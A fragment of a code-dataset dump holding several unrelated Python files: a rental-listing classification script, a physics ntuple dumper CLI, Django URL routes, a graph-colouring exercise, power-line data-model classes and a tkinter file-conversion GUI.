Center']\r\nfor name in facilities:\r\n train_df = newColumn(name, train_df, train_df['features'])\r\nprint(train_df)\r\n\r\n\r\n\r\ndef newfeat(name, df, series):\r\n \"\"\"Create a Series for my feature building loop to fill\"\"\"\r\n feature = pd.Series(0, df.index, name=name)\r\n \"\"\"Now populate the new Series with numeric values\"\"\"\r\n for row, word in enumerate(series):\r\n if name in word:\r\n feature.iloc[row] = 1\r\n df[name] = feature\r\n return(df)\r\n \r\ntrain_df = newfeat('Elevator', train_df, train_df.features)\r\ntrain_df = newfeat('Dogs Allowed', train_df, train_df.features)\r\ntrain_df = newfeat('Cats Allowed', train_df, train_df.features)\r\ntrain_df = newfeat('Hardwood Floors', train_df, train_df.features)\r\ntrain_df = newfeat('Dishwasher', train_df, train_df.features)\r\ntrain_df = newfeat('Doorman', train_df, train_df.features)\r\n\r\ntrain_df[\"created\"] = pd.to_datetime(train_df[\"created\"])\r\ntrain_df[\"created_year\"] = train_df[\"created\"].dt.year\r\ntrain_df[\"created_month\"] = train_df[\"created\"].dt.month\r\ntrain_df[\"created_day\"] = train_df[\"created\"].dt.day\r\ntrain_df[\"num_photos\"] = train_df[\"photos\"].apply(len)\r\n\r\ntrain_df['price'] = train_df['price'].clip(upper=13000)\r\ntrain_df[\"logprice\"] = np.log(train_df[\"price\"])\r\n\r\n\r\ntrain_df[\"price_t\"] =train_df[\"price\"]/train_df[\"bedrooms\"]\r\n\r\n\r\ntrain_df[\"room_sum\"] = train_df[\"bedrooms\"]+train_df[\"bathrooms\"] \r\n\r\n\r\ntrain_df['price_per_room'] = train_df['price']/train_df['room_sum']\r\n\r\n\r\n\r\ntrain_df['latitude'] = round(train_df['latitude'], 2)\r\ntrain_df['longitude'] = round(train_df['longitude'], 2)\r\ntrain_df['latlong'] = train_df.latitude.map(str) + ', ' + train_df.longitude.map(str)\r\n#print(len(train_df['latlong'].unique()))\r\ntest_df['latitude'] = round(test_df['latitude'], 2)\r\ntest_df['longitude'] = round(test_df['longitude'], 2)\r\ntest_df['latlong'] = test_df.latitude.map(str) + ', ' + test_df.longitude.map(str)\r\n\r\nzipcode = pd.read_csv(\"zipcode.csv\")\r\n\r\n\r\ntrain_df= pd.merge(train_df, zipcode, how = 'left', on=['latlong'])\r\ntrain_df = train_df.drop('void',1)\r\ntest_df = pd.merge(test_df, zipcode, how = 'left', on=['latlong'])\r\ntest_df = test_df.drop('void',1)\r\n\r\n\r\n#print(train_zip.tail())\r\n\r\nb_id = pd.concat([train_df['building_id'], test_df['building_id']]).unique()\r\nb_id = pd.DataFrame(b_id)\r\nb_id.columns = ['building_id']\r\nb_id['building_index'] = [i for i in range(len(b_id))]\r\nm_id = pd.concat([train_df['manager_id'], test_df['manager_id']]).unique()\r\nm_id = pd.DataFrame(m_id)\r\nm_id.columns = ['manager_id']\r\nm_id['manager_index'] = [i for i in range(len(m_id))]\r\n#print(m_id)\r\ntrain_df= pd.merge(train_df, b_id, how = 'left', on=['building_id'])\r\ntrain_df= pd.merge(train_df, m_id, how = 'left', on=['manager_id'])\r\ntest_df = pd.merge(test_df, b_id, how = 'left', on=['building_id'])\r\ntest_df = pd.merge(test_df, m_id, how = 'left', on=['manager_id'])\r\n#print(train_zip.tail())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nprint(len(train_df))\r\n#print(train_df.tail())\r\n\r\nfeatures_to_use = [\"bathrooms\", \"bedrooms\", \"price\",\r\n \"num_photos\", \"Elevator\", \"Dogs Allowed\",'Hardwood Floors','Cats Allowed'\r\n ,'Dishwasher','Doorman',\r\n \"created_year\", \"created_month\", \"created_day\",'latitude','longitude'\r\n ]\r\n\r\ntarget_num_map = {'high':0, 'medium':1, 'low':2}\r\nX = train_df[features_to_use]\r\ny = np.array(train_df['interest_level'].apply(lambda x: target_num_map[x]))\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import log_loss\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, VotingClassifier \r\n\r\n\r\n\r\n\r\n\r\nrandom_state = 5000\r\n\r\n\r\nX_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.34, random_state = 5000)\r\n\r\n\r\nrf1 = RandomForestClassifier(n_estimators=250, criterion='entropy', n_jobs = 1, random_state=random_state)\r\nrf1.fit(X_train, y_train)\r\ny_val_pred = rf1.predict_proba(X_val)\r\ny_val_pred_acc = rf1.predict(X_val)\r\n\r\n\r\nprint(log_loss(y_val, y_val_pred))\r\n\r\nprint(accuracy_score(y_val, y_val_pred_acc))\r\n\r\n\r\n'''\r\nfrom sklearn import svm\r\nrf2 = svm.SVC()\r\nrf2.fit(X_train, y_train)\r\ny_val_pred2 = rf2.predict_proba(X_val)\r\ny_val_pred_acc2 = rf2.predict(X_val)\r\n\r\n\r\n\r\n\r\nprint(log_loss(y_val, y_val_pred2))\r\n\r\nprint(accuracy_score(y_val, y_val_pred_acc2))\r\n'''\r\n\r\n\r\n\r\n'''\r\ntrain_df['pet_friendly'] = train_df['Cats Allowed'] + train_df['Dogs Allowed']\r\nprint(train_df['pet_friendly'])\r\n'''\r\n\r\n\r\n'''\r\nfeature_value = train_df['features'].tolist()\r\n\r\nfeature_lst=[]\r\nfor i in range(len(feature_value)):\r\n feature_lst += feature_value[i]\r\n\r\nmylist = list(feature_lst)\r\nprint(mylist)\r\nprint(len(mylist))\r\n\r\nfrom collections import Counter\r\nc=Counter(mylist)\r\ndef Most_Common(lst):\r\n data = Counter(lst)\r\n return data.most_common(10)\r\nprint(Most_Common(mylist))\r\n'''","sub_path":"MySigma.py","file_name":"MySigma.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"169558885","text":"#!/usr/bin/env python\n\nfrom Gaugi.messenger import LoggingLevel\nfrom Gaugi import ToolSvc\n\nfrom kepler.core import ElectronLoop\nfrom kepler.core.enumerators import Dataframe as DataframeEnum\n\nimport argparse\nimport sys,os\n\nparser = argparse.ArgumentParser(description = '', add_help = False)\nparser = argparse.ArgumentParser()\n\n#\n# job configuration\n#\n\nparser.add_argument('-i','--inputFiles', action='store',\n dest='inputFiles', required = True, nargs='+',\n help = \"The input files.\")\n\nparser.add_argument('-o','--outputFile', action='store',\n dest='outputFile', required = False, default = None,\n help = \"The output name.\")\n\nparser.add_argument('-n','--nov', action='store',\n dest='nov', required = False, default = -1, type=int,\n help = \"Number of events.\")\n\nparser.add_argument('-p','--path', action='store',\n dest='path', required = False, default='*/HLT/Physval/Egamma/probes', type=str,\n help = \"Ntuple base path.\")\n\nparser.add_argument('-l','--level', action='store',\n dest='level', required = False, type=str, default='INFO',\n help = \"VERBOSE/INFO/DEBUG/WARNING/ERROR/FATAL\")\n\nparser.add_argument('--mute', action='store_true',\n dest='mute', required = False, \n help = \"Use this for production. quite output\")\n\n#\n# event selection configuration\n#\n\nparser.add_argument('--et_bins', action='store',\n dest='et_bins', required = False, type=str, default='[15.0, 20.0, 30.0, 40.0, 50.0, 100000]',\n help = \"et bin ranges\")\n \nparser.add_argument('--eta_bins', action='store',\n dest='eta_bins', required = False, type=str, default='[0.0, 0.8, 1.37, 1.54, 2.37, 2.50]',\n help = \"eta bin ranges\")\n\nparser.add_argument('--pidname', action='store',\n dest='pidname', required = False, type=str, default='el_lhvloose',\n help = \"Offline pid cut.\") \n\nparser.add_argument('--et_min', action='store',\n dest='et_min', required = False, type=int, default=0,\n help = \"Fast calo min et value in GeV.\") \n\nparser.add_argument('--et_max', action='store',\n dest='et_max', required = False, type=int, default=1000,\n help = \"Fast calo max et value in GeV\") \n\n#parser.add_argument('--old_path', action='store_true',\n# dest='old_path', required = False, \n# help = \"Use 2017 physval ntuple path\") \n\n\n\n\nif len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\nargs = parser.parse_args()\n\n\n\nacc = ElectronLoop( \"EventATLASLoop\",\n inputFiles = args.inputFiles,\n treePath = eval(args.path),\n dataframe = DataframeEnum.Electron_v1,\n outputFile = args.outputFile,\n level = getattr(LoggingLevel, args.level),\n mute_progressbar = args.mute,\n )\n\n\n\n#extra_keys+= install_Zee_ringer_v6()\n#extra_keys+= install_Zee_ringer_v8()\nfrom kepler.menu.install import install_commom_features_for_electron_dump\nextra_features = install_commom_features_for_electron_dump() \n\n\nfrom kepler.dumper import ElectronDumper\netbins = [15,100]\netabins = [0,2.5]\n\nfrom kepler.filter import Filter, SelectionType, EtCutType\nfilter = Filter(\"ElectronFilter\")\n\nfilter.setCutValue(SelectionType.SelectionOnlineWithRings)\nfilter.setCutValue(EtCutType.OfflineAbove, 2) # this is default for now\nfilter.setCutValue( SelectionType.SelectionPID, eval(args.pidname) )\nfilter.setCutValue( EtCutType.L2CaloAbove, args.et_min )\nfilter.setCutValue( EtCutType.L2CaloBelow, args.et_max )\n\nToolSvc+=filter\n\noutput = args.outputFile.replace('.root','')\n\ndumper = ElectronDumper(\"Dumper\", output, eval(args.et_bins), eval(args.eta_bins), dumpRings=True)\ndumper += extra_features\nToolSvc+=dumper\n\nacc.run(args.nov)\n\n\n","sub_path":"share/dump_electron.py","file_name":"dump_electron.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"169194613","text":"\"\"\"Определяет схемы URL для BLOGS\"\"\"\r\n\r\nfrom django.urls import path\r\nfrom . import views\r\n\r\napp_name = 'blogs'\r\nurlpatterns = [\r\n # Домашняя страница\r\n path('', views.index, name='index'),\r\n\r\n # Страница для добавение нового поста.\r\n path('new_post/', views.new_post, name='new_post'),\r\n\r\n # Страница для редактирования поста.\r\n path('edit_post//', views.edit_post, name='edit_post'),\r\n]","sub_path":"blog/blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"93809460","text":"\"\"\"\nYou are given an undirected graph with its maximum degree (the degree of a node\nis the number of edges connected to the node).\n\nYou need to write a function that can take an undirected graph as its argument\nand color the graph legally (a legal graph coloring is when no adjacent nodes\nhave the same color).\n\nThe number of colors necessary to complete a legal coloring is always one more\nthan the graph's maximum degree.\n\"\"\"\n# Definition for a graph node.\nclass GraphNode:\n def __init__(self, label):\n self.label = label\n self.neighbors = set()\n self.color = None\n\ndef color_graph(graph, colors):\n # Your code here\n for node in graph:\n legalColors = colors.copy()\n\n # Find the restricted colors for this node and remove the from our legal colors list above ^\n for neighbor in node.neighbors:\n if neighbor.color is not None and neighbor.color in legalColors:\n # Find the index and pop it\n colorIdx = legalColors.index(neighbor.color)\n legalColors.pop(colorIdx)\n\n # Set the node's color to the first item in the legal colors list\n node.color = legalColors[0]\n\n\ng1 = GraphNode('G1')\ng2 = GraphNode('G2')\ng3 = GraphNode('G3')\ng4 = GraphNode('G4')\ng5 = GraphNode('G5')\n\ng1.neighbors.add(g2)\ng1.neighbors.add(g4)\ng1.neighbors.add(g3)\n\ng2.neighbors.add(g1)\ng2.neighbors.add(g4)\ng2.neighbors.add(g5)\n\ng3.neighbors.add(g1)\ng3.neighbors.add(g5)\ng3.neighbors.add(g4)\n\ng4.neighbors.add(g1)\ng4.neighbors.add(g2)\ng4.neighbors.add(g3)\ng4.neighbors.add(g5)\n\ng5.neighbors.add(g2)\ng5.neighbors.add(g3)\ng5.neighbors.add(g4)\n\ngraph = [g1, g2, g3, g4, g5]\ncolors = ['red', 'green', 'blue', 'purple', 'orange']\n\ncolor_graph(graph, colors)\n\nfor node in graph:\n print(node.color)","sub_path":"src/demonstration_1.py","file_name":"demonstration_1.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"125859936","text":"from enum import Enum,unique\nimport sqlhelper\n\n\nclass Tower:\n def __init__(self):\n self.serialNum=-1\n self.title=None\n self.towerType=-1\n self.longitude=-1\n self.latitude=-1\n self.preTower=-1\n self.nextTower=-1\n self.crossLineType=-1\n self.preLine=-1\n self.nextLine=-1\n self.towerHeight=-1\n self.branch01=-1\n self.branch02=-1\n self.branch03=-1\n def __repr__(self):\n return repr(self.serialNum,self.title,self.towerType,self.longitude,self.latitude,self.preTower,self.nextTower,self.crossLineType,self.preLine,self.nextLine,self.towerHeight,self.branch01,self.branch02,self.branch03)\n\nclass LineTool:\n def __init__(self,serialNumber,title = None,type=-1,longitude=-1,latitude=-1,lineSerialNum=-1,preTower=-1,nextTower=-1,preObstacle=-1,nextObstacle=-1,length=-1,cruiseFlag=-1):\n self.serialNumber = serialNumber\n self.title = title\n self.type=type\n self.longitude=longitude\n self.latitude=latitude\n self.lineSerialNum=lineSerialNum\n self.preTower=preTower\n self.nextTower=nextTower\n self.preObstacle=preObstacle\n self.nextObstacle=nextObstacle\n self.length=length\n self.cruiseFlag=cruiseFlag\n def __repr__(self):\n return repr(self.serialNumber,self.title,self.type,self.longitude,self.latitude,self.lineSerialNum,self.preTower,self.nextTower,self.preObstacle,self.nextObstacle,self.length,self.cruiseFlag)\n\nclass PointTool:\n def __init__(self):\n self.serialNumber = None\n self.title = None\n self.type = None\n self.longitude = None\n self.latitude = None\n self.lineSerialNum = None\n self.preTower = None\n self.nextTower = None\n self.preObstacle = None\n self.nextObstacle = None\n self.relativeCoord01=None\n self.relativeCoord02 = None\n def __repr__(self):\n return repr(self.serialNumber,self.title,self.type,self.longitude,self.latitude,self.lineSerialNum,self.preTower,self.nextTower,self.preObstacle,self.nextObstacle,self.relativeCoord01,self.relativeCoord02)\n\nclass Circuit:\n def __init__(self,serialNumber=-1,title = None,type = -1,preTower=-1,nextTower=-1,obstacleNum=0,directionAngle=0,relativeCoord01=-1,relativeCoord02=-1):\n self.serialNumber = serialNumber\n self.title = title\n self.type = type\n self.preTower = preTower\n self.nextTower= nextTower\n self.obstacleNum =obstacleNum\n self.directionAngle =directionAngle\n self.relativeCoord01 =relativeCoord01\n self.relativeCoord02 =relativeCoord02\n def __repr__(self):\n return repr(self.serialNumber,self.title,self.type,self.preTower,self.nextTower,self.obstacleNum,self.directionAngle,self.relativeCoord01,self.relativeCoord02)\n\n#special navigation route\nclass RouteMap:\n def __init__(self,serialNumber=None,title=None,routeIsExist=None,beginTower=None,endTower=None,mapData=None,distance=0,towerNum=0,powerNum=0,obstacleNum=0):\n self.serialNumber=serialNumber\n self.title=title\n self.routeIsExist=routeIsExist\n self.beginTower=beginTower\n self.endTower=endTower\n self.mapData=mapData\n self.distance=distance\n self.towerNum=towerNum\n self.powerNum=powerNum\n self.obstacleNum=obstacleNum\n def __repr__(self):\n return repr(self.serialNumber,self.title,self.beginTower,self.endTower,self.mapData,self.distance,self.towerNum,self.powerNum,self.obstacleNum)\n\nclass CompoundCircuit:\n def __init__(self,circuit):\n self.circuit=circuit\n self.toolList=self.setAllTools()\n def __repr__(self):\n return repr(self.circuit,self.toolList)\n def setAllTools(self):\n circuitSerialNum=self.circuit.serialNumber\n toolsList=[]\n if circuitSerialNum!=-1 or circuitSerialNum!=None:\n dbOp=sqlhelper.dbcrud()\n condition='lineSerialNum='+str(circuitSerialNum)+' order by serialNumber asc'\n data =dbOp.queryData('lineTools','serialNumber,title,type,longitude,latitude,lineSerialNum,preTower,nextTower,preObstacle,nextObstacle,length,cruiseFlag',condition);\n if len(data)>0:\n for i in data:\n tool=LineTool(serialNumber=i[0],title=i[1],type=i[2],longitude=i[3],latitude=i[4],lineSerialNum=i[5],preTower=i[6],nextTower=i[7],preObstacle=i[8],nextObstacle=i[9],length=i[10],cruiseFlag=i[11])\n toolsList.append(tool)\n return toolsList\n\nclass CompoundMapSegment:\n def __init__(self,preTower,nextTower,compoundCircuit):\n self.preTower=preTower\n self.nextTower=nextTower\n self.compoundCircuit=compoundCircuit\n self.number=self.compoundCircuit.circuit.serialNumber\n\n def __repr__(self):\n return repr(self.preTower,self.nextTower,self.compoundCircuit)\n#task type enum value\nclass TaskType(Enum):\n one=0\n two=1\n three=2\n four=3\n five=4\n six=5\n seven=6\n\n\nclass ObjType(Enum):\n tower=0\n lineTool01=1\n lineTool02=2\n pointTool=3\n\n\nclass JSONObject:\n def __init__(self, d):\n self.__dict__ = d\n\n# GPS位置数据类型\nclass LocationMsg:\n def __init__(self,longitude=-1,latitude=-1):\n self.longitude=longitude\n self.latitude=latitude\n def __repr__(self):\n return repr(self.longitude,self.latitude)\n\n#TODO GPS卫星数据类型\nclass GPSMsg:\n def __init__(self,GPGSV,GPGLL,GORMC,GPVTG,GPGGA,GPGSA):\n pass\n\n\nclass MapSegWidget:\n def __init__(self,type,name,serialNum,longitude,latitude,preObj=-1,nextObj=-1,length=-1,isPassed=False):\n\n self.name=name\n self.type=type\n self.serialNum=serialNum\n self.longitude=longitude\n self.latitude=latitude\n self.preObj=preObj\n self.nextObj=nextObj\n self.length=length\n self.isPassed=isPassed\n\n#TODO 设置导航提醒的距离枚举\nclass NavigationRemidDis(Enum):\n arrive=0\n close=1\n near=2\n\n\n\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"393836686","text":"import tkinter\nfrom tkinter import messagebox as dialog, filedialog as file_wm\nimport os\nfrom typing import Dict, Any\n\nfrom com.zcnst.constant import mainFinal\nfrom com.zcnst.service import file_convert as convert\nfrom threading import Thread\n\ndef msgDialog(level: int, msg: str):\n '''\n 消息对话框\n :param level: 消息级别\n :param msg: 消息\n :return:\n '''\n if level <= 0:\n dialog.showinfo(\"提示\", msg)\n elif level == 1:\n dialog.showwarning(\"警告\", msg)\n else:\n dialog.showerror(\"错误\", msg)\n\n\ndef start_convert_event(wm, event, fileChoice=None, symbol=tkinter.Entry, encoding=str, coord=()):\n if convert.getConvertState():\n return\n convert.setConverted()\n\n files = fileChoice.get_files()\n del fileChoice\n symbol_text = symbol.get()\n if files.__len__() == 0:\n msgDialog(1, \"请选择文本文件!\")\n elif symbol_text == \"\":\n msgDialog(1, \"请输入分割符!\")\n else:\n convert.setConverting()\n progress = Progress(wm.getCanvas(), x1=coord[0], y1=coord[1], x2=coord[2], y2=coord[3], outline='#FFE300', backageColor='#2B9ADA', progressColor='#84D945')\n convert.ConvertThreading(event, files, encoding, symbol_text, progress, wm).start()\n wm.update()\n\n\nclass Window(tkinter.Tk):\n eventMode: Dict[Any, Dict[Any, Any]]\n _init_width, _init_height = 700, 400\n _main_wm = _progress = None\n\n def setCanvas(self, canvas=tkinter.Canvas):\n self._main_wm = canvas\n\n def getCanvas(self):\n return self._main_wm\n\n def __init__(self):\n super(Window, self).__init__()\n self.title(mainFinal.WIN_TITLE_STR)\n self.wm_iconname(mainFinal.WIN_TITLE_STR)\n self.wm_overrideredirect(True) # 去掉标题栏\n self.wm_resizable(width=False, height=False) # 禁止窗口最大化和拉伸\n self.wm_attributes(\"-topmost\", True, \"-alpha\", 1) # 置顶窗体,且透明度为80%\n self.wm_iconbitmap(bitmap=mainFinal.WIN_ICON_PATH)\n\n # 设置窗口的初始位置居中\n screen = self._get_vga()\n x = (screen[\"W\"] - self._init_width) / 2\n y = (screen[\"H\"] - self._init_height) / 2\n self.wm_geometry(\"%dx%d+%d+%d\" % (self._init_width, self._init_height, x, y))\n\n # 改变背景色, kwargs 传入的是字典\n def changeBg(self, event, kwargs):\n event.widget.config(bg=kwargs[\"color\"])\n\n # 最小化窗口\n def minimize(self, event, args):\n self.withdraw()\n self.wm_overrideredirect(False)\n self.state(\"iconic\")\n\n # 最小化后恢复窗口\n def frame_mapped(self, event):\n self.wm_overrideredirect(True)\n self.deiconify()\n\n # 移动窗口事件\n def select_wid(self, event):\n self.x = event.x\n self.y = event.y\n\n def stop_wid(self, event):\n self.x = None\n self.y = None\n\n def moving_wid(self, event):\n new_x = (event.x - self.x) + self.winfo_x()\n new_y = (event.y - self.y) + self.winfo_y()\n self.wm_geometry(\"+%d+%d\" % (new_x, new_y))\n\n # 关闭窗口\n def close(self, event, args):\n os._exit(0)\n\n # 鼠标悬浮,事件\n def hoverEvent(self, fun, event, **args):\n if \"mode\" in args and args[\"mode\"] == \"IN\":\n self.eventMode = {event.widget._name: {\"focus\": True}}\n else:\n self.eventMode = None\n fun(event, args)\n\n # 鼠标单击事件\n def clickOn(self, fun, event, **kwargs):\n eventMode, widNmae = self.eventMode, event.widget._name\n if eventMode is not None:\n if widNmae in eventMode and eventMode[widNmae][\"focus\"]:\n fun(event, kwargs)\n\n def init_main_wm(self):\n \"\"\"\n 初始化自定义窗口背景\n :return:\n \"\"\"\n\n # 添加背景图片\n global image\n image = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_BACK_IMG_PATH, self._init_width, self._init_height)\n main_wm = tkinter.Canvas(self, width=self._init_width, height=self._init_height, bg=\"green\", highlightthickness=0)\n main_wm.create_image((0, 0), anchor=tkinter.NW, image=image)\n main_wm.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=False)\n\n # 添加窗口图标\n global icon\n icon = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_APP_LOGO, 64, 64)\n icon_label = tkinter.Label(self, width=60, height=60, bg=\"#042900\", image=icon, borderwidth=0)\n main_wm.create_window((70, 35), window=icon_label, anchor=tkinter.NW)\n\n # 添加窗口标题\n main_wm.create_text((self._init_width / 2 - 108, 45), text=mainFinal.WIN_TITLE_STR, font=(\"黑体\", 24, \"bold\"), fill=\"#1AFA29\", anchor=tkinter.NW)\n\n # 添加菜单\n global imageMenu\n imageMenu = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_MENU_IMG, 16, 16)\n self.codingVar = tkinter.StringVar()\n self.codingVar.set(\"UTF-8\")\n mb = tkinter.Menubutton(self, name=\"menuCharCode\", width=32, height=26, image=imageMenu, bd=0, bg=\"#3C3F41\", fg=\"white\", activebackground=\"red\",\n relief=tkinter.FLAT)\n filemenu = tkinter.Menu(mb, tearoff=False, bg=\"#3C3F41\", bd=0, activebackground=\"red\", font=(\"黑体\", 10), fg=\"white\", relief=tkinter.FLAT)\n for item in [\"ANSI\", \"ASCII \", \"UTF-8\", \"UTF-16\", \"UTF-32\", \"GBK\", \"GB2312\", \"GB18030\", \"BIG5\", \"ISO8859-1\", \"ISO8859-2\",\n \"ISO8859-3\", \"ISO8859-4\", \"ISO8859-5\", \"ISO8859-6\", \"ISO8859-7\", \"ISO8859-15\", \"ISO8859-16\"]:\n filemenu.add_radiobutton(label=item, command=None, variable=self.codingVar, value=item, selectcolor=\"white\")\n mb.config(menu=filemenu)\n main_wm.create_window((self._init_width - 96, 0), window=mb, anchor=tkinter.NW)\n\n # 添加最小化\n global ImageMinimize\n ImageMinimize = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_MIN_IMG, 16, 16)\n bt = tkinter.Button(self, name=\"minimize\", width=32, height=24, image=ImageMinimize, bd=0, bg=\"#3C3F41\", activebackground=\"red\", relief=tkinter.FLAT)\n bt.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"red\", mode=\"IN\"))\n bt.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"#3C3F41\"))\n bt.bind(\"\", lambda event: self.clickOn(self.minimize, event))\n main_wm.create_window((self._init_width - 64, 0), window=bt, anchor=tkinter.NW)\n\n # 最小化后显示窗口\n self.bind(\"\", self.frame_mapped)\n\n # 移动窗口\n main_wm.bind(\"\", self.select_wid)\n main_wm.bind(\"\", self.stop_wid)\n main_wm.bind(\"\", self.moving_wid)\n\n # 添加窗口关闭按钮\n global imageClose\n imageClose = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_CLOSE_IMG, 16, 16)\n bt = tkinter.Button(self, name=\"close\", width=32, height=24, image=imageClose, bd=0, bg=\"#3C3F41\", activebackground=\"red\", relief=tkinter.FLAT)\n bt.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"red\", mode=\"IN\"))\n bt.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"#3C3F41\"))\n bt.bind(\"\", lambda event: self.clickOn(self.close, event))\n main_wm.create_window((self._init_width - 32, 0), window=bt, anchor=tkinter.NW)\n\n self.setCanvas(main_wm)\n\n def init_component(self):\n \"\"\"\n 初始化组件\n :return:\n \"\"\"\n main_wm = self.getCanvas()\n\n entryStartPosition = self._init_width / 2 - 180\n\n # 输入目录��段说明文字 及 输入控件\n field_style, entry_style = mainFinal.WIN_FIELD_STYLE, mainFinal.WIN_ENTRY_STYLE\n main_wm.create_text(35, 145, text=\"待转换的文件:\", anchor=tkinter.NW, font=field_style[\"font\"], fill=field_style[\"fill\"])\n fileChoice = FileChoice(self, \"请选择TXT文件 或 包含TXT文件夹!\")\n fileChoice.set_relief(tkinter.FLAT).set_font(entry_style[\"font\"]).set_bd(entry_style[\"bd\"]).set_bg(entry_style[\"bg\"]).set_fg(\n entry_style[\"fg\"]).set_highlightbackground(entry_style[\"highlightbackground\"]).set_selectbackground(\n entry_style[\"selectbackground\"]).set_highlightcolor(entry_style[\"highlightcolor\"])\n fileDialog = fileChoice.composition(takefocus=False, width=60, title=\"请选择TXT文件,可选择多个!\", fileType=[(\"TXT文件\", \".txt\"),(\"CSV文件\",\".CSV\")])\n main_wm.create_window(entryStartPosition, 140, window=fileDialog, anchor=tkinter.NW)\n\n # 输入分隔符字段说明文字 及 输入控件\n main_wm.create_text(35, 215, text=\"请输入分隔符:\", anchor=tkinter.NW, font=field_style[\"font\"], fill=field_style[\"fill\"])\n decollatorValue = tkinter.StringVar(self, \"|\")\n decollator = tkinter.Entry(self, width=60, textvariable=decollatorValue, cnf=entry_style, takefocus=False)\n main_wm.create_window(entryStartPosition, 210, window=decollator, anchor=tkinter.NW)\n\n global runIco\n runIco = mainFinal.WIN_TITLE_BACK_IMG(mainFinal.WIN_RUN_IMG, 24, 24)\n runBut = tkinter.Button(text=\"开始转换 \", name=\"runConversion\", image=runIco, bg=\"green\", bd=0, highlightthickness=4, font=(\"黑体\", 16, \"bold\"), \\\n fg=\"#EBEEEF\", width=140, height=24, relief=\"flat\", takefocus=False, activebackground=\"#FFE300\", \\\n activeforeground=\"#84D945\", compound=tkinter.RIGHT, highlightcolor=\"#FFE300\")\n runBut.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"red\", mode=\"IN\"))\n runBut.bind(\"\", lambda event: self.hoverEvent(self.changeBg, event=event, color=\"green\"))\n runFun = lambda event, kwargs: start_convert_event(self, event, fileChoice, decollator, self.codingVar.get(), kwargs[\"coord\"])\n runBut.bind(\"\", lambda event: self.clickOn(runFun, event, coord=(35, 350, self._init_width - 35, 370)))\n\n main_wm.create_window(self._init_width / 2 - 80, 280, window=runBut, anchor=tkinter.NW)\n\n def show_windows(self):\n \"\"\"\n 显示程序\n :return:\n \"\"\"\n self.init_main_wm()\n self.init_component()\n self.mainloop()\n\n def _get_vga(self):\n \"\"\"\n 获取屏幕的分辨率\n :return: 返回字典类型值;X, Y\n \"\"\"\n return {\"W\": self.winfo_screenwidth(), \"H\": self.winfo_screenheight()}\n\n\nclass Progress:\n \"\"\"\n 进度条\n \"\"\"\n\n def __init__(self, canvas=tkinter.Canvas, x1=int, y1=int, x2=int, y2=int, outline=str, backageColor=str, progressColor=str):\n \"\"\"\n 初始化进度条\n :param canvas:画布\n :param outline:边框颜色\n :param backageColor:进度条背景\n :param progressColor:进度色彩\n \"\"\"\n self.x1 = x1\n self.y1 = y1\n self.x2 = x2\n self.y2 = y2\n self.width, self.height = self.x2 - self.x1, self.y2 - self.y1\n self.progress_out = canvas.create_rectangle(self.x1, self.y1, self.x2, self.y2, outline=outline, fill=backageColor)\n self.progress_in = canvas.create_rectangle(self.x1, self.y1, self.x1, self.y2, outline=progressColor, fill=progressColor)\n self.canvas = canvas\n\n textValue = \"0 %\"\n text_x1 = (self.width / 2 + self.x1) - (textValue.__len__() * 10)\n font_size = int(self.height / 10 + 10)\n text_y1 = (self.height - font_size) / 2 + self.y1\n self.propress_txt = canvas.create_text(text_x1, text_y1, text=textValue, anchor=tkinter.NW, font=(\"宋体\", font_size, \"bold\"), fill=outline)\n\n def update_progress(self, wm=tkinter.Tk, finish_rate=float):\n \"\"\"\n 更新进度条\n :param wm:父窗口\n :param finish_rate:完成率 0-1,1最大\n :return:\n \"\"\"\n # ((x2-x2 【确定了进度条的长度】) * 完成率【增加的实际长度】)+x1=增加后的实际x2坐标\n new_x2 = (self.width * finish_rate) + self.x1\n self.canvas.coords(self.progress_in, (self.x1, self.y1, (self.x2 if new_x2 >= self.x2 else new_x2), self.y2))\n self.canvas.itemconfig(self.propress_txt, text=\"{:.0%}\".format(finish_rate))\n wm.update()\n\n def clearProgress(self):\n \"\"\"\n 清除进度条\n :return:\n \"\"\"\n self.canvas.delete(self.progress_in, self.progress_out, self.propress_txt)\n\n\nclass FileChoice(tkinter.Frame):\n \"\"\"\n 文���选择框\n \"\"\"\n wm, path_choice, choice_but, hintMsg = None, None, None, None\n hintMsgStr = \"\"\n cnf, btcnf = {}, {}\n select_files = []\n\n def __init__(self, wm, hintMsg):\n self.wm = wm\n self.hintMsgStr = hintMsg\n super(FileChoice, self).__init__(self.wm)\n self.hintMsg = tkinter.StringVar(self.wm, hintMsg)\n\n def set_bg(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"bg\"] = color\n return self\n\n def set_fg(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"fg\"] = color\n self.btcnf[\"fg\"] = color\n return self\n\n def set_highlightbackground(self, color=str):\n if color.strip() != \"\":\n 